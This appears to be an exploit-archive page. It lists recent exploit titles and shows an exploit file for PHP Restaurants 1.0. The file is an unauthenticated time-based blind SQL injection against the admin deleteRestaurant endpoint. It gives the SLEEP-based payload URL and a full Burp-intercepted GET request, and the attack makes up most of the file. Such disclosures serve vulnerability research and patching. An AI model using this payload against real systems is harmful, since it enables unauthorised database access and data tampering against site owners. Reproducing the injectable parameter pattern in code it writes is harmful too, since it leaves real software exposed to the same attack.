ad453a2c73
17 changes to exploits/shellcodes CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path Mozilla Firefox 67 - Array.pop JIT Type Confusion Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service) Ametys CMS v4.4.1 - Cross Site Scripting (XSS) uBidAuction v2.0.1 - 'Multiple' Cross Site Scripting (XSS) Chamilo LMS 1.11.14 - Account Takeover Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated) WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated) Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated) PHP Restaurants 1.0 - SQLi (Unauthenticated) Moodle 3.11.4 - SQL Injection Huawei DG8045 Router 1.0 - Credential Disclosure PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS) WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS) WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming
33 lines
No EOL
1.3 KiB
Text
33 lines
No EOL
1.3 KiB
Text
# Exploit Title: PHP Restaurants 1.0 - SQLi (Unauthenticated)
|
|
# Google Dork: None
|
|
# Date: 01/29/2022
|
|
# Exploit Author: Nefrit ID
|
|
# Vendor Homepage: https://github.com/jcwebhole
|
|
# Software Link: https://github.com/jcwebhole/php_restaurants
|
|
# Version: 1.0
|
|
# Tested on: Kali Linux & Windows 10
|
|
|
|
*SQL injection is a code injection technique used to attack
|
|
data-driven applications, in which malicious SQL statements are
|
|
inserted into an entry field for execution (e.g. to dump the database
|
|
contents to the attacker). wikipedia*
|
|
|
|
|
|
===Start===
|
|
Exploit Url = http://localhost/php_restaurants-master/admin/functions.php?f=deleteRestaurant&id=1337
|
|
AND (SELECT 3952 FROM (SELECT(SLEEP(5)))XMSid)
|
|
|
|
Burpsuite Proxy Intercept
|
|
GET /php_restaurants-master/admin/functions.php?f=deleteRestaurant&id=1337
|
|
HTTP/1.1
|
|
Host: web_server_ip
|
|
Upgrade-Insecure-Requests: 1
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
|
|
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69
|
|
Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Referer: http://web_server_ip/php_restaurants-master/admin/index.php
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
Cookie: uid=1
|
|
Connection: close |